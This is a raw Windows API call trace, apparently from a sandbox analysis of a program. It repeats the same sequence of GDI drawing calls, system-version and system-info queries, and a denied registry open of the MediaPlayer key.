0xffffffff [0087.646] BeginPath (hdc=0x0) returned 0 [0087.646] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.646] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.646] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.646] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.646] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.646] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.647] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.647] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.647] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa0401d3 [0087.647] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x80401d6 [0087.647] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040915 [0087.647] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040916 [0087.647] CombineRgn (hrgnDst=0x1040915, hrgnSrc1=0xa0401d3, hrgnSrc2=0x80401d6, iMode=1) returned 1 [0087.647] CombineRgn (hrgnDst=0x1040916, hrgnSrc1=0xa0401d3, hrgnSrc2=0x80401d6, iMode=4) returned 2 [0087.647] CreateSolidBrush (color=0xff) returned 0x2100914 [0087.647] CreateSolidBrush (color=0xff0000) returned 0x1100917 [0087.647] DeleteObject (ho=0x1100917) returned 1 [0087.647] DeleteObject (ho=0x80401d6) returned 1 [0087.647] DeleteObject (ho=0xa0401d3) returned 1 [0087.647] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.647] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.647] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.647] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.647] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.647] BeginPath (hdc=0x0) returned 0 [0087.647] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.647] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.647] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.647] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.647] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.647] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.647] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.647] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.647] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x90401d6 [0087.647] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb0401d3 [0087.647] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040918 [0087.647] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040919 [0087.647] CombineRgn (hrgnDst=0x1040918, hrgnSrc1=0x90401d6, hrgnSrc2=0xb0401d3, iMode=1) returned 1 [0087.647] CombineRgn (hrgnDst=0x1040919, hrgnSrc1=0x90401d6, hrgnSrc2=0xb0401d3, iMode=4) returned 2 [0087.647] CreateSolidBrush (color=0xff) returned 0x2100917 [0087.647] CreateSolidBrush (color=0xff0000) returned 0x110091a [0087.647] DeleteObject (ho=0x110091a) returned 1 [0087.648] DeleteObject (ho=0xb0401d3) returned 1 [0087.648] DeleteObject (ho=0x90401d6) returned 1 [0087.648] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.648] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.648] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.648] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.648] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.648] BeginPath (hdc=0x0) returned 0 [0087.648] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.648] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.648] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.648] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.648] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.648] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.648] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.648] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.648] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc0401d3 [0087.648] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa0401d6 [0087.648] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104091b [0087.648] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104091c [0087.648] CombineRgn (hrgnDst=0x104091b, hrgnSrc1=0xc0401d3, hrgnSrc2=0xa0401d6, iMode=1) returned 1 [0087.648] CombineRgn (hrgnDst=0x104091c, hrgnSrc1=0xc0401d3, hrgnSrc2=0xa0401d6, iMode=4) returned 2 [0087.648] CreateSolidBrush (color=0xff) returned 0x210091a [0087.648] CreateSolidBrush (color=0xff0000) returned 0x110091d [0087.648] DeleteObject (ho=0x110091d) returned 1 [0087.648] DeleteObject (ho=0xa0401d6) returned 1 [0087.648] DeleteObject (ho=0xc0401d3) returned 1 [0087.648] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.648] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.648] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.648] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.648] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.648] BeginPath (hdc=0x0) returned 0 [0087.648] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.648] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.648] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.648] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.648] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.648] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.648] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.648] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.649] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb0401d6 [0087.649] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd0401d3 [0087.649] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104091e [0087.649] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104091f [0087.649] CombineRgn (hrgnDst=0x104091e, hrgnSrc1=0xb0401d6, hrgnSrc2=0xd0401d3, iMode=1) returned 1 [0087.649] CombineRgn (hrgnDst=0x104091f, hrgnSrc1=0xb0401d6, hrgnSrc2=0xd0401d3, iMode=4) returned 2 [0087.649] CreateSolidBrush (color=0xff) returned 0x210091d [0087.649] CreateSolidBrush (color=0xff0000) returned 0x1100920 [0087.649] DeleteObject (ho=0x1100920) returned 1 [0087.649] DeleteObject (ho=0xd0401d3) returned 1 [0087.649] DeleteObject (ho=0xb0401d6) returned 1 [0087.649] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.649] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.649] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.649] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.649] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.649] BeginPath (hdc=0x0) returned 0 [0087.649] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.649] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.649] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.649] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.649] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.649] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.649] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.649] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.649] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe0401d3 [0087.649] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc0401d6 [0087.649] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040921 [0087.649] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040922 [0087.649] CombineRgn (hrgnDst=0x1040921, hrgnSrc1=0xe0401d3, hrgnSrc2=0xc0401d6, iMode=1) returned 1 [0087.649] CombineRgn (hrgnDst=0x1040922, hrgnSrc1=0xe0401d3, hrgnSrc2=0xc0401d6, iMode=4) returned 2 [0087.649] CreateSolidBrush (color=0xff) returned 0x2100920 [0087.649] CreateSolidBrush (color=0xff0000) returned 0x1100923 [0087.649] DeleteObject (ho=0x1100923) returned 1 [0087.649] DeleteObject (ho=0xc0401d6) returned 1 [0087.649] DeleteObject (ho=0xe0401d3) returned 1 [0087.649] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.649] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.650] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.650] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.650] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.650] BeginPath (hdc=0x0) returned 0 [0087.650] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.650] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.650] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.650] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.650] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.650] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.650] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.650] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.650] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd0401d6 [0087.650] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf0401d3 [0087.650] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040924 [0087.650] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040925 [0087.650] CombineRgn (hrgnDst=0x1040924, hrgnSrc1=0xd0401d6, hrgnSrc2=0xf0401d3, iMode=1) returned 1 [0087.650] CombineRgn (hrgnDst=0x1040925, hrgnSrc1=0xd0401d6, hrgnSrc2=0xf0401d3, iMode=4) returned 2 [0087.650] CreateSolidBrush (color=0xff) returned 0x2100923 [0087.650] CreateSolidBrush (color=0xff0000) returned 0x1100926 [0087.650] DeleteObject (ho=0x1100926) returned 1 [0087.650] DeleteObject (ho=0xf0401d3) returned 1 [0087.650] DeleteObject (ho=0xd0401d6) returned 1 [0087.650] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.650] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.650] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.650] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.650] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.650] BeginPath (hdc=0x0) returned 0 [0087.650] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.650] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.650] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.650] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.650] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.650] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.650] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.650] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.650] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x100401d3 [0087.651] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe0401d6 [0087.651] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040927 [0087.651] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040928 [0087.651] CombineRgn (hrgnDst=0x1040927, hrgnSrc1=0x100401d3, hrgnSrc2=0xe0401d6, iMode=1) returned 1 [0087.651] CombineRgn (hrgnDst=0x1040928, hrgnSrc1=0x100401d3, hrgnSrc2=0xe0401d6, iMode=4) returned 2 [0087.651] CreateSolidBrush (color=0xff) returned 0x2100926 [0087.651] CreateSolidBrush (color=0xff0000) returned 0x1100929 [0087.651] DeleteObject (ho=0x1100929) returned 1 [0087.651] DeleteObject (ho=0xe0401d6) returned 1 [0087.651] DeleteObject (ho=0x100401d3) returned 1 [0087.651] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.651] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.651] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.651] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.651] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.651] BeginPath (hdc=0x0) returned 0 [0087.651] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.651] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.651] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.651] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.651] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.651] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.651] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.651] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.651] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf0401d6 [0087.651] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x110401d3 [0087.651] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104092a [0087.651] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104092b [0087.651] CombineRgn (hrgnDst=0x104092a, hrgnSrc1=0xf0401d6, hrgnSrc2=0x110401d3, iMode=1) returned 1 [0087.651] CombineRgn (hrgnDst=0x104092b, hrgnSrc1=0xf0401d6, hrgnSrc2=0x110401d3, iMode=4) returned 2 [0087.651] CreateSolidBrush (color=0xff) returned 0x2100929 [0087.651] CreateSolidBrush (color=0xff0000) returned 0x110092c [0087.651] DeleteObject (ho=0x110092c) returned 1 [0087.651] DeleteObject (ho=0x110401d3) returned 1 [0087.651] DeleteObject (ho=0xf0401d6) returned 1 [0087.651] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.651] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.651] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.651] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.651] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.651] BeginPath (hdc=0x0) returned 0 [0087.651] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.652] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.652] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.652] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.652] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.652] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.652] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.652] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.652] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x120401d3 [0087.652] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x100401d6 [0087.652] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104092d [0087.652] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104092e [0087.652] CombineRgn (hrgnDst=0x104092d, hrgnSrc1=0x120401d3, hrgnSrc2=0x100401d6, iMode=1) returned 1 [0087.652] CombineRgn (hrgnDst=0x104092e, hrgnSrc1=0x120401d3, hrgnSrc2=0x100401d6, iMode=4) returned 2 [0087.652] CreateSolidBrush (color=0xff) returned 0x210092c [0087.652] CreateSolidBrush (color=0xff0000) returned 0x110092f [0087.652] DeleteObject (ho=0x110092f) returned 1 [0087.652] DeleteObject (ho=0x100401d6) returned 1 [0087.652] DeleteObject (ho=0x120401d3) returned 1 [0087.652] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.652] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.652] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.652] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.652] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.652] BeginPath (hdc=0x0) returned 0 [0087.652] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.652] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.652] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.652] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.652] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.652] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.652] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.652] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.652] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x110401d6 [0087.652] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x130401d3 [0087.652] 